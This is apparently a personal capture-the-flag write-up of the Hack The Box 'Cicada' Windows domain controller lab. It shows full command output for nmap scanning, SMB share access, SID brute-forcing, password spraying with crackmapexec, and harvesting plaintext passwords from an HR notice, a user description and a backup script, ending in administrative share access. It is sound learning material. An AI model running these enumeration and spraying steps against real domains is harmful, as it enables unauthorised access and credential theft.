HTB Cicada - 🪟
HTB Cicada - 🪟
Enumeration
nmap:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
nmap -sC -sV -A -T4 -Pn 10.10.11.35
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-17 18:39 IST
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 4.15% done; ETC: 18:40 (0:01:09 remaining)
Debugging Increased to 1.
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 6.90% done; ETC: 18:39 (0:00:40 remaining)
Current sending rates: 40.57 packets / s, 1652.82 bytes / s.
Overall sending rates: 190.49 packets / s, 8381.56 bytes / s.
Packet capture filter (device tun0): dst host 10.10.14.90 and (icmp or (tcp and (src host 10.10.11.35)))
OS detection timingRatio() == (1739797810.737 - 1739797810.236) * 1000 / 500 == 1.002
OS detection timingRatio() == (1739797813.609 - 1739797813.107) * 1000 / 500 == 1.002
Packet capture filter (device tun0): (ip or ip6) and dst host 10.10.14.90
mass_rdns: 0.02s 0/2 [#: 1, OK: 0, NX: 0, DR: 0, SF: 0, TR: 2]
DNS resolution of 2 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 2, DR: 0, SF: 0, TR: 2, CN: 0]
NSE: Script scanning 10.10.11.35.
NSE: Starting runlevel 1 (of 3) scan.
NSE: Starting smb-os-discovery against 10.10.11.35.
NSE: Starting nbstat against 10.10.11.35.
NSE: Starting smb-security-mode against 10.10.11.35.
NSE: Starting sslv2 against 10.10.11.35:3269.
NSE: Starting smb2-security-mode against 10.10.11.35.
NSE: Starting sslv2 against 10.10.11.35:389.
NSE: Starting address-info against 10.10.11.35.
NSE: Finished address-info against 10.10.11.35.
NSE: Starting p2p-conficker against 10.10.11.35.
NSE: [p2p-conficker 10.10.11.35] Conficker: Generating ports based on ip (0x230b0a0a) and seed (2876)
NSE: Starting smb2-time against 10.10.11.35.
NSE: Starting dns-nsid against 10.10.11.35:53.
NSE: Starting sslv2 against 10.10.11.35:3268.
NSE: Starting sslv2 against 10.10.11.35:636.
NSE: Finished sslv2 against 10.10.11.35:3269.
NSE: [smb-os-discovery 10.10.11.35] SMB: Added account '' to account list
NSE: [smb-os-discovery 10.10.11.35] SMB: Added account 'guest' to account list
NSE: Finished sslv2 against 10.10.11.35:389.
NSE: Finished sslv2 against 10.10.11.35:636.
NSE: [smb-os-discovery 10.10.11.35] Couldn't negotiate a SMBv1 connection:SMB: Failed to receive bytes: ERROR
NSE: Finished smb-os-discovery against 10.10.11.35.
NSE: Finished sslv2 against 10.10.11.35:3268.
NSE: [smb-security-mode 10.10.11.35] Couldn't negotiate a SMBv1 connection:SMB: Failed to receive bytes: ERROR
NSE: Finished smb-security-mode against 10.10.11.35.
NSE: Finished nbstat against 10.10.11.35.
NSE: [dns-nsid 10.10.11.35:53] dns.query() got zero responses attempting to resolve query: id.server
NSE: Finished smb2-security-mode against 10.10.11.35.
NSE: Finished smb2-time against 10.10.11.35.
NSE: [ms-sql-info 10.10.11.35:389] Couldn't negotiate a SMBv1 connection:SMB: Failed to receive bytes: ERROR
NSE: [ms-sql-info 10.10.11.35:389] Couldn't negotiate a SMBv1 connection:SMB: Failed to receive bytes: ERROR
NSE: [ms-sql-info 10.10.11.35:389] Couldn't negotiate a SMBv1 connection:SMB: Failed to receive bytes: ERROR
NSE: [dns-nsid 10.10.11.35:53] dns.query() got zero responses attempting to resolve query: version.bind
NSE: Finished dns-nsid against 10.10.11.35:53.
NSE: Finished p2p-conficker against 10.10.11.35.
NSE: Starting runlevel 2 (of 3) scan.
NSE: Starting ssl-cert against 10.10.11.35:3268.
NSE: Starting ssl-date against 10.10.11.35:3268.
NSE: Starting ssl-date against 10.10.11.35:389.
NSE: Starting rpc-grind against 10.10.11.35:464.
NSE: Starting ssl-known-key against 10.10.11.35:3269.
NSE: Starting tls-alpn against 10.10.11.35:3269.
NSE: Starting tls-nextprotoneg against 10.10.11.35:3268.
NSE: Starting ssl-cert against 10.10.11.35:389.
NSE: Starting ssl-known-key against 10.10.11.35:636.
NSE: Starting ssl-cert against 10.10.11.35:3269.
NSE: Starting ssl-cert against 10.10.11.35:636.
NSE: Starting rpc-grind against 10.10.11.35:445.
NSE: Starting tls-alpn against 10.10.11.35:3268.
NSE: Starting tls-nextprotoneg against 10.10.11.35:636.
NSE: Starting tls-alpn against 10.10.11.35:636.
NSE: Starting ssl-date against 10.10.11.35:636.
NSE: Starting ssl-date against 10.10.11.35:3269.
NSE: Starting tls-nextprotoneg against 10.10.11.35:389.
NSE: Starting tls-alpn against 10.10.11.35:389.
NSE: Starting tls-nextprotoneg against 10.10.11.35:3269.
NSE: [rpc-grind 10.10.11.35:445] isRPC didn't receive response.
NSE: [rpc-grind 10.10.11.35:445] Target port 445 is not a RPC port.
NSE: Finished rpc-grind against 10.10.11.35:445.
NSE: [rpc-grind 10.10.11.35:464] isRPC didn't receive response.
NSE: [rpc-grind 10.10.11.35:464] Target port 464 is not a RPC port.
NSE: Finished rpc-grind against 10.10.11.35:464.
NSE: [tls-alpn 10.10.11.35:636] Server did not return TLS ALPN extension.
NSE: [tls-alpn 10.10.11.35:636] None of 31 protocols chosen
NSE: Finished tls-alpn against 10.10.11.35:636.
NSE: [tls-alpn 10.10.11.35:3269] Server did not return TLS ALPN extension.
NSE: [tls-alpn 10.10.11.35:3269] None of 31 protocols chosen
NSE: Finished tls-alpn against 10.10.11.35:3269.
NSE: [tls-nextprotoneg 10.10.11.35:3269] Server does not support TLS NPN extension.
NSE: Finished tls-nextprotoneg against 10.10.11.35:3269.
NSE: [tls-nextprotoneg 10.10.11.35:636] Server does not support TLS NPN extension.
NSE: Finished tls-nextprotoneg against 10.10.11.35:636.
NSE: Finished ssl-cert against 10.10.11.35:3268.
NSE: [tls-nextprotoneg 10.10.11.35:3268] Server does not support TLS NPN extension.
NSE: Finished tls-nextprotoneg against 10.10.11.35:3268.
NSE: [tls-alpn 10.10.11.35:389] Server did not return TLS ALPN extension.
NSE: [tls-alpn 10.10.11.35:389] None of 31 protocols chosen
NSE: Finished tls-alpn against 10.10.11.35:389.
NSE: [tls-alpn 10.10.11.35:3268] Server did not return TLS ALPN extension.
NSE: [tls-alpn 10.10.11.35:3268] None of 31 protocols chosen
NSE: Finished tls-alpn against 10.10.11.35:3268.
NSE: [tls-nextprotoneg 10.10.11.35:389] Server does not support TLS NPN extension.
NSE: Finished tls-nextprotoneg against 10.10.11.35:389.
NSE: Finished ssl-known-key against 10.10.11.35:3269.
NSE: Finished ssl-cert against 10.10.11.35:389.
NSE: Finished ssl-date against 10.10.11.35:636.
NSE: Finished ssl-known-key against 10.10.11.35:636.
NSE: Finished ssl-date against 10.10.11.35:3269.
NSE: Finished ssl-cert against 10.10.11.35:3269.
NSE: Finished ssl-cert against 10.10.11.35:636.
NSE: Finished ssl-date against 10.10.11.35:3268.
NSE: Finished ssl-date against 10.10.11.35:389.
NSE: Starting runlevel 3 (of 3) scan.
NSE: Starting clock-skew against 10.10.11.35.
NSE: Finished clock-skew against 10.10.11.35.
Nmap scan report for 10.10.11.35
Host is up (0.21s latency).
Scanned at 2025-02-17 18:39:10 IST for 108s
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-17 20:09:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022 (89%)
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2022 (89%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.94SVN%E=4%D=2/17%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=67B33562%P=aarch64-unknown-linux-gnu)
SEQ(SP=104%GCD=1%ISR=10B%TI=I%II=I%SS=S%TS=A)
OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M53CNW8NNT11%O4=M53CNW8ST11%O5=M53CNW8ST11%O6=M53CST11)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M53CNW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)
Network Distance: 2 hops
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-02-17T20:10:21
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb-security-mode:
|_ ERROR: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_clock-skew: 6h59m59s
| nbstat:
|_ ERROR: Name query failed: TIMEOUT
| smb-os-discovery:
|_ ERROR: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 218.85 ms 10.10.14.1
2 218.92 ms 10.10.11.35
Final times for host: srtt: 211927 rttvar: 3368 to: 225399
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
NSE: Starting runlevel 2 (of 3) scan.
NSE: Starting runlevel 3 (of 3) scan.
NSE: Starting clock-skew.
NSE: Finished clock-skew.
Read from /usr/share/nmap: nmap-os-db nmap-protocols nmap-service-probes nmap-services.
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.89 seconds
smbmap:
1
2
3
4
5
6
7
8
9
10
11
smbmap -H 10.10.11.35 -u guest
[+] IP: 10.10.11.35:445 Name: cicada.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
DEV NO ACCESS
HR READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
1
2
3
4
5
6
7
8
9
10
11
12
smbclient //10.10.11.35/HR
Password for [WORKGROUP\d31ty]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 17:59:09 2024
.. D 0 Thu Mar 14 17:51:29 2024
Notice from HR.txt A 1266 Wed Aug 28 23:01:48 2024
4168447 blocks of size 4096. 418650 blocks available
smb: \>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
──(d31ty㉿kali)-[~/Downloads/HTB/cicada]
└─$ cat Notice\ from\ HR.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
Here I got clueless on how to proceed further, coz the ‘Notice from HR.txt’ contained the password and don’t know how to move forward. So in the writeup, they used Lookupsid technique.
Lookupsid Now that we have found this password we could try checking to see if any accounts are still using this password. To do this, we must find out all the users that are in the domain, and we can do this using Impacket’s lookupsid module. This tool will try brute forcing Windows Security Identifiers (SIDs) of any users in the AD domain. Each user has a unique SID, which is comprised of their relative identifier (RID) concatenated with the domain SID. User SIDs are typically issued by a Domain Controller and are used in authorization and access mechanisms such as to form a part of the access token created during sign-in.
I couldn’t understand why out of all techniques they using this, here comes the gpt…….
If you know, what is IPC$ and SID lookup, you can skip to the next section. [[#Enumeration [Contd.]]]
Great question! Let’s break down why Lookupsid is used during the enumeration phase when you’re looking at something like SMB shares, particularly in the case of finding a share like IPC$.
What is IPC$?
The IPC$ (Inter-Process Communication) share in Windows is a special, hidden SMB share used for communication between processes on a network. It’s mainly used for administrative tasks and remote access like file and printer sharing, and it allows remote applications or services to connect to the system for inter-process communication.
Scenario: IPC$ Share Read-Only
- If you’re scanning SMB shares and you find that IPC$ is read-only, it typically means the server is allowing remote connections, but it’s restricting write access. This is a common configuration for system and admin-level communications but does not directly allow file transfers or modifications. It might still allow you to gather information, especially in terms of enumerating available shares or querying the system for information (e.g., users, groups, domain info).
Why Use Lookupsid During Enumeration?
During enumeration in pentesting, tools like Lookupsid become useful for a few reasons:
1. SID Discovery in SMB Enumeration
- While performing SMB enumeration, you might find that certain shares or resources are linked to specific SIDs in access control lists (ACLs) or other security-related configurations.
- IPC$ is a share commonly referenced by system processes and administrators. However, it’s also a place where you might encounter SIDs during enumeration, either from SMB scans or from file shares that have specific user/group access defined by SID (not just by names like
Everyone,Administrators, etc.).
2. Identifying Users and Groups
- When you look at share permissions (for example, through tools like
smbclient,enum4linux, ornmap), you might see SIDs listed in ACLs or security descriptors. These SIDs could represent specific users or groups on the machine. Lookupsidhelps you resolve these SIDs to actual user or group names. For example, if you find thatS-1-5-32-544is the SID associated with the IPC$ share’s permissions,Lookupsidwill help you translate that to a real user/group name, such as Administrators.- By using
Lookupsidduring enumeration, you get a clear picture of who has access to certain resources, even if the share is restricted (read-only). This is critical in understanding access control and knowing which accounts or groups you might target later for privilege escalation or lateral movement.
3. Understanding Privileges and Access Control
- You might not have write access to IPC$, but you can still get information from it. For example, by enumerating access control lists (ACLs), you may discover which user or group (represented by a SID) has permissions to use the share.
- Knowing who has access can guide your actions during the enumeration phase. For example, if you find that Domain Admins (or another high-privilege group) has some form of access to the share, this could suggest that privilege escalation opportunities might exist.
- This information is especially valuable in larger Active Directory environments, where privileges and access can be very granular and distributed across multiple users and groups.
4. Mapping Network Access
- During enumeration, you might encounter restricted resources (like IPC$), but knowing who has access can help you map out the network and understand which accounts are active and have specific permissions to certain shares or resources.
- SIDs can be found in places like Windows event logs, SMB session details, or even Windows registry keys, which you can examine to get more details. Using
Lookupsidon these SIDs can show you which users/groups are tied to a particular set of permissions or shares.
5. Exploiting Information from SMB Shares
- While you may not have write access to IPC$, it suggests that this user might have additional administrative shares available elsewhere on the network.
- Enumerating SIDs and resolving them via
Lookupsidhelps you identify where privileged users are located and what their permissions might be, helping you plan your next steps for pivoting or privilege escalation.
In Summary:
Lookupsidis useful during the enumeration phase because it allows you to translate SIDs into user and group names.- By understanding which users or groups have access to resources (like IPC$), you can begin to map out user privileges, identify high-value targets for privilege escalation, and plan your lateral movement in the network.
- Even if the share is read-only, knowing who has access can reveal important information for the next stages of your pentest, such as privilege escalation or lateral movement across the network.
Enumeration [Contd.]
impacket
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
impacket-lookupsid 'cicada.htb/guest'@cicada.htb -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at cicada.htb
[*] StringBinding ncacn_np:cicada.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
513: CICADA\Domain Users (SidTypeGroup)
514: CICADA\Domain Guests (SidTypeGroup)
515: CICADA\Domain Computers (SidTypeGroup)
516: CICADA\Domain Controllers (SidTypeGroup)
517: CICADA\Cert Publishers (SidTypeAlias)
518: CICADA\Schema Admins (SidTypeGroup)
519: CICADA\Enterprise Admins (SidTypeGroup)
520: CICADA\Group Policy Creator Owners (SidTypeGroup)
521: CICADA\Read-only Domain Controllers (SidTypeGroup)
522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
525: CICADA\Protected Users (SidTypeGroup)
526: CICADA\Key Admins (SidTypeGroup)
527: CICADA\Enterprise Key Admins (SidTypeGroup)
553: CICADA\RAS and IAS Servers (SidTypeAlias)
571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1101: CICADA\DnsAdmins (SidTypeAlias)
1102: CICADA\DnsUpdateProxy (SidTypeGroup)
1103: CICADA\Groups (SidTypeGroup)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
1601: CICADA\emily.oscars (SidTypeUser)
From the scan we filtered the usernames and saved it for IPC$ enum.
Then crackmapexec tool came in handy to find the user.
1
2
3
4
5
6
7
8
9
10
11
crackmapexec smb cicada.htb -u user.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
SMB cicada.htb 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB cicada.htb 445 CICADA-DC [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB cicada.htb 445 CICADA-DC [-] cicada.htb\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB cicada.htb 445 CICADA-DC [-] cicada.htb\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB cicada.htb 445 CICADA-DC [-] cicada.htb\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB cicada.htb 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB cicada.htb 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB cicada.htb 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
michael.wrightson
Then again, I referred on the step, I figured and learned crackmapexec can be great tool in various aspects.
Enumeration Phase II
1
2
3
4
5
6
7
8
9
10
11
12
crackmapexec smb cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
SMB cicada.htb 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB cicada.htb 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB cicada.htb 445 CICADA-DC [+] Enumerated domain user(s)
SMB cicada.htb 445 CICADA-DC cicada.htb\emily.oscars badpwdcount: 0 desc:
SMB cicada.htb 445 CICADA-DC cicada.htb\david.orelious badpwdcount: 1 desc: Just in case I forget my password is aRt$Lp#7t*VQ!3
SMB cicada.htb 445 CICADA-DC cicada.htb\michael.wrightson badpwdcount: 0 desc:
SMB cicada.htb 445 CICADA-DC cicada.htb\sarah.dantelia badpwdcount: 6 desc:
SMB cicada.htb 445 CICADA-DC cicada.htb\john.smoulder badpwdcount: 6 desc:
SMB cicada.htb 445 CICADA-DC cicada.htb\krbtgt badpwdcount: 5 desc: Key Distribution Center Service Account
SMB cicada.htb 445 CICADA-DC cicada.htb\Guest badpwdcount: 0 desc: Built-in account for guest access to the computer/domain
SMB cicada.htb 445 CICADA-DC cicada.htb\Administrator badpwdcount: 7 desc: Built-in account for administering the computer/domain
Now we got david.orelious password. pass: aRt$Lp#7t*VQ!3
So this guy has read access to DEV
1
2
3
4
5
6
7
8
9
10
11
12
13
14
crackmapexec smb cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
SMB cicada.htb 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB cicada.htb 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB cicada.htb 445 CICADA-DC [+] Enumerated shares
SMB cicada.htb 445 CICADA-DC Share Permissions Remark
SMB cicada.htb 445 CICADA-DC ----- ----------- ------
SMB cicada.htb 445 CICADA-DC ADMIN$ Remote Admin
SMB cicada.htb 445 CICADA-DC C$ Default share
SMB cicada.htb 445 CICADA-DC DEV READ
SMB cicada.htb 445 CICADA-DC HR READ
SMB cicada.htb 445 CICADA-DC IPC$ READ Remote IPC
SMB cicada.htb 445 CICADA-DC NETLOGON READ Logon server share
SMB cicada.htb 445 CICADA-DC SYSVOL READ Logon server share
![[Screenshot 2025-02-19 at 18.19.44.png]]
Later I enumerated other shares, and no interesting information found.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
Now password of user: emily.oscars pass: Q!3@Lp#M6b*7t*Vt
So now let’s try ADMIN$ and C$ shares
![[Screenshot 2025-02-19 at 18.24.28.png]]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
┌──(d31ty㉿kali)-[~/Downloads/HTB/cicada]
└─$ smbclient //10.10.11.35/ADMIN$ -U emily.oscars
Password for [WORKGROUP\emily.oscars]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Sep 23 22:05:40 2024
.. DHS 0 Thu Feb 20 01:12:37 2025
$Reconfig$ D 0 Wed Aug 21 21:23:29 2024
ADFS D 0 Sat May 8 14:04:49 2021
ADWS D 0 Thu Mar 14 16:31:01 2024
appcompat D 0 Thu Aug 22 04:54:41 2024
apppatch D 0 Fri Aug 30 04:21:02 2024
AppReadiness D 0 Fri Aug 30 04:29:10 2024
assembly DR 0 Sat May 8 15:12:41 2021
AzureArcSetup D 0 Fri Aug 30 04:20:56 2024
bcastdvr D 0 Sat May 8 13:50:24 2021
bfsvc.exe A 114688 Fri Aug 30 04:09:26 2024
Boot D 0 Fri Aug 30 04:20:57 2024
bootstat.dat AS 67584 Wed Feb 19 16:47:06 2025
Branding D 0 Sat May 8 13:50:24 2021
BrowserCore D 0 Fri Aug 30 04:21:03 2024
CAPolicy.inf A 76 Fri Aug 23 01:54:34 2024
CbsTemp D 0 Mon Sep 23 22:02:14 2024
certenroll.log A 849 Fri Aug 23 01:48:37 2024
certocm.log A 238330 Fri Aug 23 02:05:46 2024
Containers D 0 Sat May 8 13:50:24 2021
Cursors D 0 Sat May 8 13:50:26 2021
debug D 0 Wed Feb 19 16:31:42 2025
diagnostics D 0 Sat May 8 14:04:49 2021
DiagTrack D 0 Sat May 8 14:04:49 2021
DigitalLocker D 0 Sat May 8 15:05:26 2021
Downloaded Program Files DS 0 Sat May 8 13:50:26 2021
drivers D 0 Sat May 8 13:50:24 2021
DtcInstall.log A 2327 Fri Aug 30 04:24:56 2024
ELAMBKUP DH 0 Sat May 8 13:50:26 2021
en-US D 0 Sat May 8 15:06:49 2021
explorer.exe A 4839992 Fri Aug 30 04:09:32 2024
Fonts DSR 0 Fri Aug 30 04:21:03 2024
Globalization D 0 Sat May 8 14:04:49 2021
Help D 0 Sat May 8 15:05:26 2021
HelpPane.exe A 1097728 Fri Aug 30 04:08:54 2024
hh.exe A 36864 Sat May 8 13:44:45 2021
IdentityCRL D 0 Sat May 8 14:04:49 2021
IME D 0 Thu Mar 3 09:28:19 2022
ImmersiveControlPanel DR 0 Fri Aug 30 04:21:03 2024
INF D 0 Wed Feb 19 16:35:50 2025
InputMethod D 0 Sat May 8 14:04:49 2021
Installer DHS 0 Thu Aug 22 22:50:03 2024
L2Schemas D 0 Sat May 8 13:50:27 2021
LiveKernelReports D 0 Sat May 8 13:50:24 2021
Logs D 0 Mon Sep 23 21:46:36 2024
lsasetup.log A 1378 Fri Mar 15 00:55:22 2024
Media D 0 Sat May 8 14:04:49 2021
mib.bin A 43131 Sat May 8 13:44:27 2021
Microsoft.NET DR 0 Wed Feb 19 16:41:39 2025
Migration D 0 Sat May 8 13:50:24 2021
ModemLogs D 0 Sat May 8 13:50:24 2021
notepad.exe A 225280 Fri Aug 30 04:11:33 2024
ntbtlog.txt A 117934 Tue Aug 27 01:42:56 2024
NTDS D 0 Wed Feb 19 16:31:26 2025
OCR D 0 Sat May 8 15:07:23 2021
Offline Web Pages DR 0 Sat May 8 13:50:27 2021
Panther D 0 Thu Aug 22 04:29:22 2024
Performance D 0 Sat May 8 13:50:24 2021
PFRO.log A 4718 Wed Feb 19 16:31:15 2025
PLA D 0 Sat May 8 14:04:50 2021
PolicyDefinitions D 0 Mon Sep 23 22:05:40 2024
Prefetch Dn 0 Fri Mar 15 00:56:31 2024
PrintDialog DR 0 Fri Aug 30 04:21:04 2024
Provisioning D 0 Sat May 8 13:50:24 2021
regedit.exe A 397312 Fri Aug 30 04:09:12 2024
Registration D 0 Wed Feb 19 16:31:44 2025
RemotePackages D 0 Sat May 8 14:04:50 2021
rescache D 0 Sat May 8 13:50:24 2021
Resources D 0 Sat May 8 14:04:50 2021
SchCache D 0 Sat May 8 13:50:24 2021
schemas D 0 Sat May 8 14:04:50 2021
security D 0 Fri Aug 23 02:49:01 2024
ServerStandard.xml A 48139 Sat May 8 13:45:52 2021
ServerStandardEval.xml A 48122 Sat May 8 13:45:52 2021
ServiceProfiles D 0 Fri Mar 15 00:55:34 2024
ServiceState D 0 Fri Mar 15 00:56:22 2024
servicing D 0 Fri Aug 30 04:21:04 2024
Setup D 0 Sat May 8 13:54:56 2021
ShellComponents D 0 Fri Aug 30 04:21:04 2024
ShellExperiences D 0 Fri Aug 30 04:21:04 2024
SKB D 0 Sat May 8 14:04:51 2021
SoftwareDistribution D 0 Thu Mar 14 16:13:48 2024
Speech D 0 Sat May 8 13:50:24 2021
